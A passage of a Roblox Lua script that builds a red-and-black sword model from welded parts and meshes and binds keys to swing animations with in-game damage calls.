  465. PartMesh.Scale = Vector3.new(0.522727311, 0.454545468, 0.931817949)
  466.  
  467. local Part = Instance.new("Part", m)
  468. Part:BreakJoints()
  469. Part.TopSurface = "Smooth"
  470. Part.Name = 'Part'
  471. Part.BottomSurface = "Smooth"
  472. Part.FormFactor = "Custom" Part.CanCollide = false
  473. Part.BrickColor = BrickColor.new("Really black")
  474. Part.Size = Vector3.new(0.200000003, 0.454545468, 0.200000003)
  475. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  476. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  477. Partweld.C1 = CFrame.new(0.000362634659, 0.903982162, -0.00256919861, -2.40126044e-11, 0, -1, 3.12099401e-05, 1, 0, 1, -3.1209951e-05, -2.70574674e-11)
  478. Partweld.Parent = Part
  479. local PartMesh = Instance.new("SpecialMesh",Part)
  480. PartMesh.MeshId = "http://www.roblox.com/asset/?id=3270017"
  481. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  482. PartMesh.Offset = Vector3.new(0, 0, 0)
  483. PartMesh.Scale = Vector3.new(0.477272719, 0.454545468, 1.18636358)
  484.  
  485. local Part = Instance.new("Part", m)
  486. Part:BreakJoints()
  487. Part.TopSurface = "Smooth"
  488. Part.Name = 'Part'
  489. Part.BottomSurface = "Smooth"
  490. Part.FormFactor = "Custom" Part.CanCollide = false
  491. Part.BrickColor = BrickColor.new("Really red")
  492. Part.Size = Vector3.new(0.200000003, 1.36363733, 0.200000003)
  493. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  494. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  495. Partweld.C1 = CFrame.new(0.000408172607, -3.2703228, -0.000365972519, 1, -1.5167876e-05, -1.11981535e-11, 1.51678742e-05, 1, 0, 1.20082199e-11, 0, 1)
  496. Partweld.Parent = Part
  497. local PartMesh = Instance.new("BlockMesh",Part)
  498. PartMesh.Name = "Mesh"
  499. PartMesh.Offset = Vector3.new(0, 0, 0)
  500. PartMesh.Scale = Vector3.new(0.522727311, 1, 0.454545468)
  501.  
  502. local Part = Instance.new("Part", m)
  503. Part:BreakJoints()
  504. Part.TopSurface = "Smooth"
  505. Part.Name = 'Part'
  506. Part.BottomSurface = "Smooth"
  507. Part.FormFactor = "Custom" Part.CanCollide = false
  508. Part.BrickColor = BrickColor.new("Really black")
  509. Part.Size = Vector3.new(0.272727281, 0.200000003, 0.545454502)
  510. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  511. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  512. Partweld.C1 = CFrame.new(-0.00299835205, -0.460396767, -0.688175201, 1, -3.1209951e-05, -2.70574674e-11, 2.20687416e-05, 0.70710665, -0.707106709, 2.2068778e-05, 0.707106709, 0.70710665)
  513. Partweld.Parent = Part
  514. local PartMesh = Instance.new("BlockMesh",Part)
  515. PartMesh.Name = "Mesh"
  516. PartMesh.Offset = Vector3.new(0, 0, 0)
  517. PartMesh.Scale = Vector3.new(1, 0.909090936, 1)
  518.  
  519. local Part = Instance.new("Part", m)
  520. Part:BreakJoints()
  521. Part.TopSurface = "Smooth"
  522. Part.Name = 'Part'
  523. Part.BottomSurface = "Smooth"
  524. Part.FormFactor = "Custom" Part.CanCollide = false
  525. Part.BrickColor = BrickColor.new("Really red")
  526. Part.Size = Vector3.new(0.200000003, 0.272728473, 0.272727251)
  527. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  528. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  529. Partweld.C1 = CFrame.new(0.000371932983, 0.356336594, -0.000364780426, 1, -3.1209951e-05, -2.70574674e-11, 3.12099401e-05, 1, 0, 2.40126044e-11, 0, 1)
  530. Partweld.Parent = Part
  531. local PartMesh = Instance.new("CylinderMesh",Part)
  532. PartMesh.Name = "Mesh"
  533. PartMesh.Offset = Vector3.new(0, 0, 0)
  534. PartMesh.Scale = Vector3.new(0.954545557, 1, 1)
  535.  
  536. local Part = Instance.new("Part", m)
  537. Part:BreakJoints()
  538. Part.TopSurface = "Smooth"
  539. Part.Name = 'Part'
  540. Part.BottomSurface = "Smooth"
  541. Part.FormFactor = "Custom" Part.CanCollide = false
  542. Part.BrickColor = BrickColor.new("Really red")
  543. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.200000003)
  544. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  545. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  546. Partweld.C1 = CFrame.new(-0.00179100037, -1.27498245, -0.138988495, 1, 0.000120599419, 5.1841198e-11, -0.000120599441, 1, 0, -6.70744987e-11, 0, 1)
  547. Partweld.Parent = Part
  548. local PartMesh = Instance.new("BlockMesh",Part)
  549. PartMesh.Name = "Mesh"
  550. PartMesh.Offset = Vector3.new(0, 0, 0)
  551. PartMesh.Scale = Vector3.new(0.545454562, 0.454545468, 0.931818128)
  552.  
  553. local Part = Instance.new("Part", m)
  554. Part:BreakJoints()
  555. Part.TopSurface = "Smooth"
  556. Part.Name = 'Part'
  557. Part.BottomSurface = "Smooth"
  558. Part.FormFactor = "Custom" Part.CanCollide = false
  559. Part.BrickColor = BrickColor.new("Really red")
  560. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.200000003)
  561. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  562. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  563. Partweld.C1 = CFrame.new(-9.91821289e-05, -1.2742815, 0.140503168, 1, 0.000112032132, 2.11457518e-11, -0.000112032118, 1, 0, -2.74188762e-11, 0, 1)
  564. Partweld.Parent = Part
  565. local PartMesh = Instance.new("BlockMesh",Part)
  566. PartMesh.Name = "Mesh"
  567. PartMesh.Offset = Vector3.new(0, 0, 0)
  568. PartMesh.Scale = Vector3.new(0.52272743, 0.454545468, 0.954545379)
  569.  
  570. local Part = Instance.new("Part", m)
  571. Part:BreakJoints()
  572. Part.TopSurface = "Smooth"
  573. Part.Name = 'Part'
  574. Part.BottomSurface = "Smooth"
  575. Part.FormFactor = "Custom" Part.CanCollide = false
  576. Part.BrickColor = BrickColor.new("Really red")
  577. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.200000003)
  578. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  579. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  580. Partweld.C1 = CFrame.new(4.57763672e-05, -3.45203209, 0.138261795, 1, -1.52991538e-06, 4.80326889e-12, 1.52991197e-06, 1, 0, -4.60346778e-12, 0, 1)
  581. Partweld.Parent = Part
  582. local PartMesh = Instance.new("BlockMesh",Part)
  583. PartMesh.Name = "Mesh"
  584. PartMesh.Offset = Vector3.new(0, 0, 0)
  585. PartMesh.Scale = Vector3.new(0.522727311, 0.454545468, 0.931818128)
  586.  
  587. local Part = Instance.new("Part", m)
  588. Part:BreakJoints()
  589. Part.TopSurface = "Smooth"
  590. Part.Name = 'Part'
  591. Part.BottomSurface = "Smooth"
  592. Part.FormFactor = "Custom" Part.CanCollide = false
  593. Part.BrickColor = BrickColor.new("Really black")
  594. Part.Size = Vector3.new(0.272727281, 0.200000003, 0.636363626)
  595. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  596. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  597. Partweld.C1 = CFrame.new(-0.00229072571, -0.776579857, -0.000361442566, 1, -9.22312756e-06, -1.07149845e-11, 9.22312756e-06, 1, 0, 1.20083362e-11, 0, 1)
  598. Partweld.Parent = Part
  599. local PartMesh = Instance.new("BlockMesh",Part)
  600. PartMesh.Name = "Mesh"
  601. PartMesh.Offset = Vector3.new(0, 0, 0)
  602. PartMesh.Scale = Vector3.new(1, 0.909090936, 1)
  603.  
  604. local Part = Instance.new("Part", m)
  605. Part:BreakJoints()
  606. Part.TopSurface = "Smooth"
  607. Part.Name = 'Part'
  608. Part.BottomSurface = "Smooth"
  609. Part.FormFactor = "Custom" Part.CanCollide = false
  610. Part.BrickColor = BrickColor.new("Really red")
  611. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.200000003)
  612. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  613. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  614. Partweld.C1 = CFrame.new(0.000368356705, -2.36870098, -0.00256919861, -2.40126044e-11, 0, -1, 3.12099401e-05, 1, 0, 1, -3.1209951e-05, -2.70574674e-11)
  615. Partweld.Parent = Part
  616. local PartMesh = Instance.new("SpecialMesh",Part)
  617. PartMesh.MeshId = "http://www.roblox.com/asset/?id=3270017"
  618. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  619. PartMesh.Offset = Vector3.new(0, 0, 0)
  620. PartMesh.Scale = Vector3.new(0.390000015, 0.454545468, 0.767272711)
  621.  
  622. local Part = Instance.new("Part", m)
  623. Part:BreakJoints()
  624. Part.TopSurface = "Smooth"
  625. Part.Name = 'Part'
  626. Part.BottomSurface = "Smooth"
  627. Part.FormFactor = "Custom" Part.CanCollide = false
  628. Part.BrickColor = BrickColor.new("Really red")
  629. Part.Size = Vector3.new(0.200000003, 0.272728473, 0.272727251)
  630. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  631. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  632. Partweld.C1 = CFrame.new(0.000370025635, -0.370936394, -0.000362873077, 1, -3.1209951e-05, -2.70574674e-11, 3.12099401e-05, 1, 0, 2.40126044e-11, 0, 1)
  633. Partweld.Parent = Part
  634. local PartMesh = Instance.new("CylinderMesh",Part)
  635. PartMesh.Name = "Mesh"
  636. PartMesh.Offset = Vector3.new(0, 0, 0)
  637. PartMesh.Scale = Vector3.new(0.954545557, 1, 1)
  638.  
  639. local Part = Instance.new("Part", m)
  640. Part:BreakJoints()
  641. Part.TopSurface = "Smooth"
  642. Part.Name = 'Part'
  643. Part.BottomSurface = "Smooth"
  644. Part.FormFactor = "Custom" Part.CanCollide = false
  645. Part.BrickColor = BrickColor.new("Really red")
  646. Part.Size = Vector3.new(0.200000003, 1.27272952, 0.200000003)
  647. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  648. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  649. Partweld.C1 = CFrame.new(-0.00159645081, -1.50010109, -0.0003657341, 1, 3.54497861e-05, -1.38697942e-11, -3.54497824e-05, 1, 0, 1.20212876e-11, 0, 1)
  650. Partweld.Parent = Part
  651. local PartMesh = Instance.new("BlockMesh",Part)
  652. PartMesh.Name = "Mesh"
  653. PartMesh.Offset = Vector3.new(0, 0, 0)
  654. PartMesh.Scale = Vector3.new(0.545454681, 1, 0.454545468)
  655.  
  656. local Part = Instance.new("Part", m)
  657. Part:BreakJoints()
  658. Part.TopSurface = "Smooth"
  659. Part.Name = 'Part'
  660. Part.BottomSurface = "Smooth"
  661. Part.FormFactor = "Custom" Part.CanCollide = false
  662. Part.BrickColor = BrickColor.new("Really black")
  663. Part.Size = Vector3.new(0.454545468, 0.454545528, 0.200000003)
  664. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  665. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  666. Partweld.C1 = CFrame.new(0.905099869, 0.00036406517, 0.00200653076, 5.48139869e-05, 1, 0, -1.19917904e-11, 0, -1, -1, 5.48139869e-05, 7.38964445e-12)
  667. Partweld.Parent = Part
  668. local PartMesh = Instance.new("SpecialMesh",Part)
  669. PartMesh.MeshId = "http://www.roblox.com/asset/?id=47260990 "
  670. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  671. PartMesh.Offset = Vector3.new(0, 0, 0)
  672. PartMesh.Scale = Vector3.new(0.409090906, 0.409090906, 0.586363614)
  673.  
  674. local Part = Instance.new("Part", m)
  675. Part:BreakJoints()
  676. Part.TopSurface = "Smooth"
  677. Part.Name = 'Part'
  678. Part.BottomSurface = "Smooth"
  679. Part.FormFactor = "Custom" Part.CanCollide = false
  680. Part.BrickColor = BrickColor.new("Really red")
  681. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.454545587)
  682. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  683. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  684. Partweld.C1 = CFrame.new(0.000259399414, 0.183724165, 3.18167973, 1, -2.18232981e-06, 2.27445227e-08, -2.27447376e-08, -5.96046448e-08, 1, -2.18232526e-06, -1, -5.96046448e-08)
  685. Partweld.Parent = Part
  686. local PartMesh = Instance.new("BlockMesh",Part)
  687. PartMesh.Name = "Mesh"
  688. PartMesh.Offset = Vector3.new(0, 0, 0)
  689. PartMesh.Scale = Vector3.new(0.522727311, 0.477272779, 1)
  690.  
  691. local Part = Instance.new("Part", m)
  692. Part:BreakJoints()
  693. Part.TopSurface = "Smooth"
  694. Part.Name = 'Part'
  695. Part.BottomSurface = "Smooth"
  696. Part.FormFactor = "Custom" Part.CanCollide = false
  697. Part.BrickColor = BrickColor.new("Really red")
  698. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.363636345)
  699. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  700. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  701. Partweld.C1 = CFrame.new(-0.00379371643, 0.185991049, 1.50038528, 1, 0.000136076589, 2.28828867e-08, -2.28776322e-08, -5.96046448e-08, 1, 0.00013607656, -1, -5.96046448e-08)
  702. Partweld.Parent = Part
  703. local PartMesh = Instance.new("BlockMesh",Part)
  704. PartMesh.Name = "Mesh"
  705. PartMesh.Offset = Vector3.new(0, 0, 0)
  706. PartMesh.Scale = Vector3.new(0.568181872, 0.5, 1)
  707.  
  708. local Part = Instance.new("Part", m)
  709. Part:BreakJoints()
  710. Part.TopSurface = "Smooth"
  711. Part.Name = 'Part'
  712. Part.BottomSurface = "Smooth"
  713. Part.FormFactor = "Custom" Part.CanCollide = false
  714. Part.BrickColor = BrickColor.new("Really red")
  715. Part.Size = Vector3.new(0.454545468, 0.454545528, 0.200000003)
  716. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  717. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  718. Partweld.C1 = CFrame.new(-2.36226559, 0.000361204147, 0.0470504761, 6.11958749e-05, 1, 0, -1.19900192e-11, 0, -1, -0.99999994, 6.11958749e-05, 1.15960574e-11)
  719. Partweld.Parent = Part
  720. local PartMesh = Instance.new("SpecialMesh",Part)
  721. PartMesh.MeshId = "http://www.roblox.com/asset/?id=47260990 "
  722. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  723. PartMesh.Offset = Vector3.new(0, 0, 0)
  724. PartMesh.Scale = Vector3.new(0.363636374, 0.363636374, 0.363636374)
  725.  
  726. local Part = Instance.new("Part", m)
  727. Part:BreakJoints()
  728. Part.TopSurface = "Smooth"
  729. Part.Name = 'Part'
  730. Part.BottomSurface = "Smooth"
  731. Part.FormFactor = "Custom" Part.CanCollide = false
  732. Part.BrickColor = BrickColor.new("Really red")
  733. Part.Size = Vector3.new(0.454545468, 0.454545528, 0.200000003)
  734. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  735. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  736. Partweld.C1 = CFrame.new(-2.36418152, 0.000360488892, -0.0429668427, 4.18317832e-05, 1, 0, -1.19900635e-11, 0, -1, -1, 4.18317723e-05, 1.25055521e-12)
  737. Partweld.Parent = Part
  738. local PartMesh = Instance.new("SpecialMesh",Part)
  739. PartMesh.MeshId = "http://www.roblox.com/asset/?id=47260990 "
  740. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  741. PartMesh.Offset = Vector3.new(0, 0, 0)
  742. PartMesh.Scale = Vector3.new(0.363636374, 0.363636374, 0.363636374)
  743.  
  744. local Part = Instance.new("Part", m)
  745. Part:BreakJoints()
  746. Part.TopSurface = "Smooth"
  747. Part.Name = 'Part'
  748. Part.BottomSurface = "Smooth"
  749. Part.FormFactor = "Custom" Part.CanCollide = false
  750. Part.BrickColor = BrickColor.new("Really black")
  751. Part.Size = Vector3.new(0.272727281, 0.200000003, 0.545454502)
  752. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  753. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  754. Partweld.C1 = CFrame.new(-0.00299835205, -0.460906029, 0.687661171, 1, -3.1209951e-05, -2.70574674e-11, 2.20687743e-05, 0.707106769, 0.707106709, -2.20687416e-05, -0.707106709, 0.707106769)
  755. Partweld.Parent = Part
  756. local PartMesh = Instance.new("BlockMesh",Part)
  757. PartMesh.Name = "Mesh"
  758. PartMesh.Offset = Vector3.new(0, 0, 0)
  759. PartMesh.Scale = Vector3.new(1, 0.909090936, 1)
  760.  
  761. local Part = Instance.new("Part", m)
  762. Part:BreakJoints()
  763. Part.TopSurface = "Smooth"
  764. Part.Name = 'Part'
  765. Part.BottomSurface = "Smooth"
  766. Part.FormFactor = "Custom" Part.CanCollide = false
  767. Part.BrickColor = BrickColor.new("Really red")
  768. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.363636345)
  769. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  770. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  771. Partweld.C1 = CFrame.new(-0.00389862061, -0.184457302, 1.50272179, 1, 0.000130918532, 2.28174031e-08, -2.28287895e-08, -5.96046448e-08, 1, 0.000130918561, -1, -5.96046448e-08)
  772. Partweld.Parent = Part
  773. local PartMesh = Instance.new("BlockMesh",Part)
  774. PartMesh.Name = "Mesh"
  775. PartMesh.Offset = Vector3.new(0, 0, 0)
  776. PartMesh.Scale = Vector3.new(0.568181872, 0.477272749, 1)
  777.  
  778. local Part = Instance.new("Part", m)
  779. Part:BreakJoints()
  780. Part.TopSurface = "Smooth"
  781. Part.Name = 'Part'
  782. Part.BottomSurface = "Smooth"
  783. Part.FormFactor = "Custom" Part.CanCollide = false
  784. Part.BrickColor = BrickColor.new("Really red")
  785. Part.Size = Vector3.new(0.200000003, 0.200000003, 0.454545379)
  786. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  787. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  788. Partweld.C1 = CFrame.new(0.000366210938, -0.184444427, 3.18046188, 0.999999821, 1.56519236e-05, 2.27635155e-08, -2.27637464e-08, -5.96046448e-08, 1, 1.56519145e-05, -0.999999762, 3.7252903e-08)
  789. Partweld.Parent = Part
  790. local PartMesh = Instance.new("BlockMesh",Part)
  791. PartMesh.Name = "Mesh"
  792. PartMesh.Offset = Vector3.new(0, 0, 0)
  793. PartMesh.Scale = Vector3.new(0.522727311, 0.477272749, 1)
  794.  
  795. local Blade1 = Instance.new("Part", m)
  796. Blade1:BreakJoints()
  797. Blade1.TopSurface = "Smooth"
  798. Blade1.Name = 'Blade1'
  799. Blade1.BottomSurface = "Smooth"
  800. Blade1.FormFactor = "Custom" Blade1.CanCollide = false
  801. Blade1.BrickColor = BrickColor.new("Light stone grey")
  802. Blade1.Size = Vector3.new(0.200000003, 3.0909102, 0.454545468)
  803. Blade1.Reflectance = 0 Blade1.Transparency = 0.10000002384186 local Blade1weld = Instance.new("ManualWeld")
  804. Blade1weld.Part0 = Handle2 Blade1weld.Part1 = Blade1 Blade1weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  805. Blade1weld.C1 = CFrame.new(-0.00213432312, -2.41007614, -0.00036406517, 1, -2.84128078e-06, -1.15534249e-11, 2.84128328e-06, 1, 0, 1.20101819e-11, 0, 1)
  806. Blade1weld.Parent = Blade1
  807. local Blade1Mesh = Instance.new("BlockMesh",Blade1)
  808. Blade1Mesh.Name = "Mesh"
  809. Blade1Mesh.Offset = Vector3.new(0, 0, 0)
  810. Blade1Mesh.Scale = Vector3.new(0.454545468, 1, 1)
  811.  
  812. local Part = Instance.new("Part", m)
  813. Part:BreakJoints()
  814. Part.TopSurface = "Smooth"
  815. Part.Name = 'Part'
  816. Part.BottomSurface = "Smooth"
  817. Part.FormFactor = "Custom" Part.CanCollide = false
  818. Part.BrickColor = BrickColor.new("Really black")
  819. Part.Size = Vector3.new(0.427272916, 0.200000003, 0.454545468)
  820. Part.Reflectance = 0 Part.Transparency = 0.10000002384186 local Partweld = Instance.new("ManualWeld")
  821. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  822. Partweld.C1 = CFrame.new(0.00492072105, 0.000297546387, -2.36869526, -2.40126044e-11, 0, -1, -0.999999702, 3.11503318e-05, 2.09183781e-11, 3.11503245e-05, 0.999999702, -8.94069672e-08)
  823. Partweld.Parent = Part
  824. local PartMesh = Instance.new("CylinderMesh",Part)
  825. PartMesh.Name = "Mesh"
  826. PartMesh.Offset = Vector3.new(0, 0, 0)
  827. PartMesh.Scale = Vector3.new(1, 0.477272749, 1)
  828.  
  829. local Part = Instance.new("Part", m)
  830. Part:BreakJoints()
  831. Part.TopSurface = "Smooth"
  832. Part.Name = 'Part'
  833. Part.BottomSurface = "Smooth"
  834. Part.FormFactor = "Custom" Part.CanCollide = false
  835. Part.BrickColor = BrickColor.new("Really red")
  836. Part.Size = Vector3.new(0.454545468, 0.454545528, 0.200000003)
  837. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  838. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  839. Partweld.C1 = CFrame.new(0.905103683, 0.000364303589, 0.00214767456, 5.48139869e-05, 1, 0, -1.19917904e-11, 0, -1, -1, 5.48139869e-05, 7.38964445e-12)
  840. Partweld.Parent = Part
  841. local PartMesh = Instance.new("SpecialMesh",Part)
  842. PartMesh.MeshId = "http://www.roblox.com/asset/?id=47260990 "
  843. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  844. PartMesh.Offset = Vector3.new(0, 0, 0)
  845. PartMesh.Scale = Vector3.new(0.454545468, 0.454545468, 0.476363629)
  846.  
  847. local Part = Instance.new("Part", m)
  848. Part:BreakJoints()
  849. Part.TopSurface = "Smooth"
  850. Part.Name = 'Part'
  851. Part.BottomSurface = "Smooth"
  852. Part.FormFactor = "Custom" Part.CanCollide = false
  853. Part.BrickColor = BrickColor.new("Really red")
  854. Part.Size = Vector3.new(0.200000003, 1.18181872, 0.200000003)
  855. Part.Reflectance = 0 Part.Transparency = 0 local Partweld = Instance.new("ManualWeld")
  856. Partweld.Part0 = Handle2 Partweld.Part1 = Part Partweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  857. Partweld.C1 = CFrame.new(-0.777746201, -0.000360012054, -0.00230026245, 3.12098346e-05, 0.999996424, -1.60187483e-07, 2.40125246e-11, 1.60187483e-07, 0.999996424, 0.999993324, -3.12097327e-05, -2.29647412e-11)
  858. Partweld.Parent = Part
  859. local PartMesh = Instance.new("SpecialMesh",Part)
  860. PartMesh.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  861. PartMesh.MeshType = Enum.MeshType.FileMesh PartMesh.Name = "Mesh"
  862. PartMesh.Offset = Vector3.new(0, 0, 0)
  863. PartMesh.Scale = Vector3.new(0.293636382, 1.2881819, 0.0972727239)
  864.  
  865. local Wedge = Instance.new("WedgePart", m)
  866. Wedge:BreakJoints()
  867. Wedge.TopSurface = "Smooth"
  868. Wedge.Name = 'Wedge'
  869. Wedge.BottomSurface = "Smooth"
  870. Wedge.FormFactor = "Custom" Wedge.CanCollide = false
  871. Wedge.BrickColor = BrickColor.new("Really red")
  872. Wedge.Size = Vector3.new(0.200000003, 0.27272734, 0.200000003)
  873. Wedge.Reflectance = 0 Wedge.Transparency = 0 local Wedgeweld = Instance.new("ManualWeld")
  874. Wedgeweld.Part0 = Handle2 Wedgeweld.Part1 = Wedge Wedgeweld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  875. Wedgeweld.C1 = CFrame.new(-0.00407028198, -4.08790874, -0.000361204147, 1, 1.63042296e-05, -1.25623956e-11, -1.63042369e-05, 1, 0, 1.20158449e-11, 0, 1)
  876. Wedgeweld.Parent = Wedge
  877. local WedgeMesh = Instance.new("SpecialMesh",Wedge)
  878. WedgeMesh.MeshId = ""
  879. WedgeMesh.MeshType = Enum.MeshType.Wedge WedgeMesh.Name = "Mesh"
  880. WedgeMesh.Offset = Vector3.new(0, 0, 0)
  881. WedgeMesh.Scale = Vector3.new(0.522727311, 1, 0.454545468)
  882.  
  883. local Blade2 = Instance.new("WedgePart", m)
  884. Blade2:BreakJoints()
  885. Blade2.TopSurface = "Smooth"
  886. Blade2.Name = 'Blade2'
  887. Blade2.BottomSurface = "Smooth"
  888. Blade2.FormFactor = "Custom" Blade2.CanCollide = false
  889. Blade2.BrickColor = BrickColor.new("Light stone grey")
  890. Blade2.Size = Vector3.new(0.200000003, 0.909091055, 0.454545379)
  891. Blade2.Reflectance = 0 Blade2.Transparency = 0.10000002384186 local Blade2weld = Instance.new("ManualWeld")
  892. Blade2weld.Part0 = Handle2 Blade2weld.Part1 = Blade2 Blade2weld.C0 = CFrame.new(0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1)
  893. Blade2weld.C1 = CFrame.new(-0.00219154358, -4.40787601, -0.000361442566, 1, 3.54056488e-06, -1.19229071e-11, -3.54056465e-06, 1, 0, 1.20120285e-11, 0, 1)
  894. Blade2weld.Parent = Blade2
  895. local Blade2Mesh = Instance.new("SpecialMesh",Blade2)
  896. Blade2Mesh.MeshId = ""
  897. Blade2Mesh.MeshType = Enum.MeshType.Wedge Blade2Mesh.Name = "Mesh"
  898. Blade2Mesh.Offset = Vector3.new(0, 0, 0)
  899. Blade2Mesh.Scale = Vector3.new(0.454545468, 1, 1)
  900.  
  901.  
  902. mouse.KeyDown:connect(function(key)
  903. key=key:lower()
  904. if key == 'f' then
  905. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(150),math.rad(30),math.rad(0)),7)
  906. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(160),math.rad(30),math.rad(0)),7)
  907. wait'.7'
  908. ypcall(function()
  909. dmgstart(math.random(8,10))
  910. end)
  911. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(170),math.rad(30),math.rad(0)),7)
  912. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(150),math.rad(30),math.rad(0)),7)
  913. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(-20),math.rad(0),math.rad(0)),5)
  914. wait'.1'
  915. ypcall(function()
  916. dmgstop()
  917. end)
  918. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),7)--yxz
  919. wait(.5)
  920. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(20)),7)
  921. elseif key == 'g' then
  922. ctween(rs,"C0",rs0*CFrame.new(0,0,0) * CFrame.Angles(math.rad(90),math.rad(90),math.rad(0)),7)
